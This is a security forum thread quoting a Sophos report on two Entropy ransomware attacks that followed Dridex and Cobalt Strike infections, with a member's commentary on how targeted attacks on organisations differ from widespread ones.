Dridex bots deliver Entropy ransomware in recent attacks

Kongo

Kongo

Level 35
Thread author
Verified
Top Poster
Well-known
Feb 25, 2017
2,492
Content source
https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/
A pair of incidents at different organizations in which attackers deployed a ransomware called Entropy were preceded by infections with tools that provided the attackers with remote access — Cobalt Strike beacons and Dridex malware — on some of the targets’ computers, before the attackers launched the ransomware.
Sophos analysts hadn’t encountered Entropy prior to these incidents. Notably, there were significant differences in the methodologies employed by the attackers between both cases: How the attackers gained a foothold in the targets; the time the attackers spent inside the target’s network; and the malware that was used to prepare the final phase of the attack were substantially different.
Some aspects of the attacks were consistent: In both cases, the attackers relied heavily on Cobalt Strike as a means to infect more machines, meeting variable levels of success depending on whether the target had protection installed on a given machine. The attackers also performed redundant exfiltration of private data to more than one cloud storage provider. During a forensic analysis, we encountered multiple instances of Dridex, the well-known, general-purpose malware that its operators can use to distribute other malware.
Click to expand...

Source: Dridex bots deliver Entropy ransomware in recent attacks
 
  • Like
  • +Reputation
Reactions: Venustus, SeriousHoax, oldschool and 5 others
Andy Ful

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,119
From the Sophos article:
A pair of incidents at different organizations in which attackers deployed a ransomware called Entropy were preceded by infections with tools that provided the attackers with remote access — Cobalt Strike beacons and Dridex malware — on some of the targets’ computers, before the attackers launched the ransomware.
Click to expand...
In the first incident, the attackers exploited the ProxyShell vulnerability on the network belonging to a North American media organization, to install a remote shell on the target’s Exchange server, and leveraged that to spread Cobalt Strike beacons to other computers. Over a four-month period, the attackers took their time probing the organization, and stealing data, before launching the attack at the beginning of December. Subsequent post-attack forensics revealed several Dridex payloads on some of the infected machines.
Click to expand...
Analysis of the second Entropy attack — this time on a regional government organization — revealed that a malicious email attachment had infected a user’s computer with the Dridex botnet Trojan, and that the attackers used Dridex to deliver additional malware (as well as the commercial remote access utility ScreenConnect) and move laterally within the target’s network.
Click to expand...
The threat actors had compiled custom versions of the Entropy ransomware DLL for each targeted organization. The malware contains hardcoded references to the targeted organization in its code, including text and images later used in an HTML ransom note dropped on infected machines.
Click to expand...

These attacks can show the difference between widespread ransomware attacks (dangerous for home users) and highly targeted attacks on organizations.
  1. In organizations, ransomware is usually applied as the final payload via lateral movement ( the network is already compromised by another malware). The ransomware can be often prevented when the proper incident analysis is performed by Administrators.
  2. The malware is often prepared/adjusted to the target.
  3. The initial attack vectors can be sometimes similar to that used in widespread attacks (emails, etc.) and sometimes not (stolen credentials, server exploits, IoT exploits, etc.).
  4. The attack surface in organizations is much larger compared to the home environment.
 
Last edited:
  • Like
  • Applause
  • +Reputation
Reactions: Venustus, SeriousHoax, harlan4096 and 1 other person
You must log in or register to reply here.

Similar threads

[correlate]
    • Like
MSSQL Databases Under Fire From FreeWorld Ransomware
Replies
0
Views
783
News Archive
[correlate]
[correlate]
Gandalf_The_Grey
    • Like
    • Applause
    • +Reputation
Security News Police dismantle ransomware group behind attacks in 71 countries
Replies
1
Views
823
Security News
vtqhtr413
vtqhtr413
MuzzMelbourne
    • Like
    • +Reputation
3 Common Initial Attack Vectors Account for Most Ransomware Campaigns
Replies
0
Views
1,055
News Archive
MuzzMelbourne
MuzzMelbourne

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top